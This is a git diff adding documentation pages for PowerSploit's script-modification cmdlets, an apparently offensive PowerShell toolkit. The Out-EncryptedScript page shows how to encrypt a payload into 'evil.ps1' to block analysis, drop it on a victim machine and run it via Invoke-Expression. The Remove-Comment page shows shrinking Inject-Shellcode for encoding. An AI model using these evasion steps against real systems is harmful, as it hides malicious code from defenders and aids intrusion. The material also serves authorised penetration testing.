(All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip) + +## RELATED LINKS + +[http://www.exploit-monday.com](http://www.exploit-monday.com) + diff --git a/docs/ScriptModification/Out-EncryptedScript.md b/docs/ScriptModification/Out-EncryptedScript.md new file mode 100755 index 0000000..36db457 --- /dev/null +++ b/docs/ScriptModification/Out-EncryptedScript.md @@ -0,0 +1,148 @@ +# Out-EncryptedScript + +## SYNOPSIS +Encrypts text files/scripts. + +PowerSploit Function: Out-EncryptedScript +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Out-EncryptedScript [-ScriptPath] [-Password] [-Salt] + [[-InitializationVector] ] [[-FilePath] ] +``` + +## DESCRIPTION +Out-EncryptedScript will encrypt a script (or any text file for that +matter) and output the results to a minimally obfuscated script - +evil.ps1 by default. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$Password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +Out-EncryptedScript .\Naughty-Script.ps1 $Password salty + +Description +----------- +Encrypt the contents of this file with a password and salt. +This will +make analysis of the script impossible without the correct password +and salt combination. +This command will generate evil.ps1 that can +dropped onto the victim machine. +It only consists of a decryption +function 'de' and the base64-encoded ciphertext. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +[String] $cmd = Get-Content .\evil.ps1 +``` + +Invoke-Expression $cmd +$decrypted = de password salt +Invoke-Expression $decrypted + +Description +----------- +This series of instructions assumes you've already encrypted a script +and named it evil.ps1. +The contents are then decrypted and the +unencrypted script is called via Invoke-Expression + +## PARAMETERS + +### -ScriptPath +Path to this script + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Password +Password to encrypt/decrypt the script + +```yaml +Type: SecureString +Parameter Sets: (All) +Aliases: + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Salt +Salt value for encryption/decryption. +This can be any string value. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -InitializationVector +Specifies a 16-character the initialization vector to be used. +This +is randomly generated by default. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: ((1..16 | ForEach-Object {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join '') +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FilePath +{{Fill FilePath Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: .\evil.ps1 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +This command can be used to encrypt any text-based file/script + +## RELATED LINKS + diff --git a/docs/ScriptModification/Remove-Comment.md b/docs/ScriptModification/Remove-Comment.md new file mode 100755 index 0000000..97335ae --- /dev/null +++ b/docs/ScriptModification/Remove-Comment.md @@ -0,0 +1,110 @@ +# Remove-Comment + +## SYNOPSIS +Strips comments and extra whitespace from a script. + +PowerSploit Function: Remove-Comment +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### FilePath (Default) +``` +Remove-Comment [-Path] +``` + +### ScriptBlock +``` +Remove-Comment [-ScriptBlock] +``` + +## DESCRIPTION +Remove-Comment strips out comments and unnecessary whitespace from a script. +This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big. + +A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. +You rock, Lee! + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$Stripped = Remove-Comment -Path .\ScriptWithComments.ps1 +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Remove-Comment -ScriptBlock { +``` + +### This is my awesome script. +My documentation is beyond reproach! + Write-Host 'Hello, World!' ### Write 'Hello, World' to the host +### End script awesomeness +} + +Write-Host 'Hello, World!' + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Remove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand +``` + +Description +----------- +Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand. + +## PARAMETERS + +### -Path +Specifies the path to your script. + +```yaml +Type: String +Parameter Sets: FilePath +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ScriptBlock +Specifies a scriptblock containing your script. + +```yaml +Type: ScriptBlock +Parameter Sets: ScriptBlock +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +### System.String, System.Management.Automation.ScriptBlock + +Accepts either a string containing the path to a script or a scriptblock. + +## OUTPUTS + +### System.Management.Automation.ScriptBlock + +Remove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired. + +## NOTES + +## RELATED LINKS + +[http://www.exploit-monday.com +http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/]() + diff --git a/docs/index.md b/docs/index.md index ac37071..9c001da 100644 --- a/docs/index.md +++ b/docs/index.md @@ -15,7 +15,7 @@ Modify and/or prepare scripts for execution on a compromised machine. Out-EncodedCommand - Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. Out-CompressedDll - Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. Out-EncryptedScript - Encrypts text files/scripts. - Remove-Comments - Strips comments and extra whitespace from a script. + Remove-Comment - Strips comments and extra whitespace from a script. ### Persistence diff --git a/mkdocs.yml b/mkdocs.yml index a0838fd..a24f7e4 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -139,3 +139,9 @@ pages: - Add-Persistence: 'Persistence/Add-Persistence.md' - Install-SSP: 'Persistence/Install-SSP.md' - Get-SecurityPackage: 'Persistence/Get-SecurityPackage.md' +- ScriptModification: + - Functions: + - Out-CompressedDll: 'ScriptModification/Out-CompressedDll.md' + - Out-EncodedCommand: 'ScriptModification/Out-EncodedCommand.md' + - Out-EncryptedScript: 'ScriptModification/Out-EncryptedScript.md' + - Remove-Comment: 'ScriptModification/Remove-Comment.md' -- cgit v1.2.3